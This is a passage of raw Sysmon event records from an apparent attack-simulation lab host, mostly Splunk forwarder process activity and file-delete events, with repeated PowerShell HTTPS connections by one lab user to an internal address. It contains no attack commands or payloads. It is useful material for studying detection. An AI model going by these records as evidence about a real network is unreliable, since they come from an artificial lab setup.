21:51:10.943{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.943{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-81CE-613A-9B96-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.943{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81CE-613A-9B96-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.928{B81B27B7-81CE-613A-9B96-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBAC53AE345F703A5C2FDC64B965D21E,SHA256=59AD20D31A044031C9E45D37922A3F15CFB0B44861202E0E82842A78E9597688,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.511{B81B27B7-81CE-613A-9A96-03000000C801}49485244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035126968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7C6D41E86623FCB5C06A90763657768E,SHA256=199D1EB705CC0427A811A8B11C79EFA9DFF8275554704D54257EE8BB342E04D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.348{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81CE-613A-9A96-03000000C801}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.348{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.348{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.348{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.348{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.348{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-81CE-613A-9A96-03000000C801}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.348{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81CE-613A-9A96-03000000C801}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.344{B81B27B7-81CE-613A-9A96-03000000C801}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:11.848{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC0B1F182FDA1D32179314FE3D44DECD,SHA256=2CE2E07E6319EDE979FDE9244EFE6109A639706C2AFBB92F03C00704602922B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:35.620{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61966-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:11.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF269E6E9BF4AD29856E82F4F0F9C767,SHA256=1BDDACA5A4C1F0E2475F24FDDA6E7384E89F2BDFB4094E12AC054992883D5D78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:11.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE1B797D07423B00FDF5070834575C17,SHA256=D5D551E25B2569E48BC9211B1A73CA2FE01C1976228313CAACD187CAA1DD9D48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:12.879{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D1AC5E6DB6BA9DB3ADA8150D34BDE43,SHA256=2185C52C1B063425F143145074344CA977E7C61B49A01804F98CEC9C027C180A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:37.418{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61967-false10.0.1.12-8000- 23542300x800000000000000035126985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:13.909{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90B04EC095F8337B8E3E0BA860F9E6F8,SHA256=E5F8463A8D3F774E0493AA656F72AB605F5EC9AA0BF3E0E3C12596BD4021996E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:39.640{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61968-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:14.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6661FD84C472A900BA7FF5BE50FB4248,SHA256=E0139091756044816B8F37F84F3D5667057D21B8A4632D2FE3F601E9F74EFAAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:14.493{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=51D41CF67E505D0B5AA6243338440F60,SHA256=462CF89747B1586F01431CCC06843749DD9A7CEE2538A28D64110757559EA978,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:15.941{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F70977531C877B7E381DC1548F9A59D0,SHA256=B1C2ADC4639C4D6AF2E2A72A221340EC7CAF5BB82267B53260A77F9D71C116C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:17.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FBF6F7EA35C6EB4B8A2FBBC611D87C3,SHA256=9ECC08D9D75224CE5735ED83081FF0440C1DF27A8C6F3434842C417CD0064BCD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:18.010{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADE3D296BB31163AF3AFF186E8BFA77A,SHA256=EC474C30D6D90D4D7B0D4BF87D6EB3C098A0E461E46AC427580AA8288DD108C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:19.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE87A2EE7246A9B220DE657087AA6162,SHA256=E8546CD309CB596A15DB22CDFECC84DB84BAA58352903F45428D31190AFD310B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:20.478{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=226BB5DD6B7D07F28DC575B0443871A0,SHA256=124B83163360F8D9E7CDAB19C8990DB804FD226957780ADDD6080C7CDCBF94FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:43.418{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61969-false10.0.1.12-8000- 23542300x800000000000000035126993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:20.062{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB69F78559EA710C05A414E9E50BEEB,SHA256=8F47A2D33275ED0707676A55CB6D2FEFE51EF07AA08F1231E83072D425C41CE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:45.640{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61970-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:21.077{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B49177B8A4CCA3706FB93B90C2C8FA94,SHA256=90D635365B5BC3A8693FD04324F1E96D10131A1D55A7D70835DD658CAD0BA163,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:22.079{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8B5276631CA3B6EE80E0FEF4606AB48,SHA256=D9CA267FE997AB729BC603CC964E697B2E1EB0F0273B7462A7CAE4F9ED1043DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:23.110{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9B37265E1EDBA5631318D5CEFD397DD,SHA256=B3C7E447488ADD685F28C23CAF3BECD719BD36B7C858F5A976CB346F74C59D7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:24.126{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38978B1694D66F8F1F31DB466CC566F2,SHA256=D339E7550BF49F3F36B04211ABE7D26AF322168105144BE1C1FA640532AEFA30,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:25.142{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CA3584611A5D3E40F1B42E71831E16D,SHA256=35E119C0876830AA943523BE48D8CF5643C376A13C0F0F0617183608BA46452E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:49.255{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61971-false10.0.1.12-8000- 10341000x800000000000000035127013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.965{B81B27B7-81DE-613A-9C96-03000000C801}65842156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.827{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81DE-613A-9C96-03000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 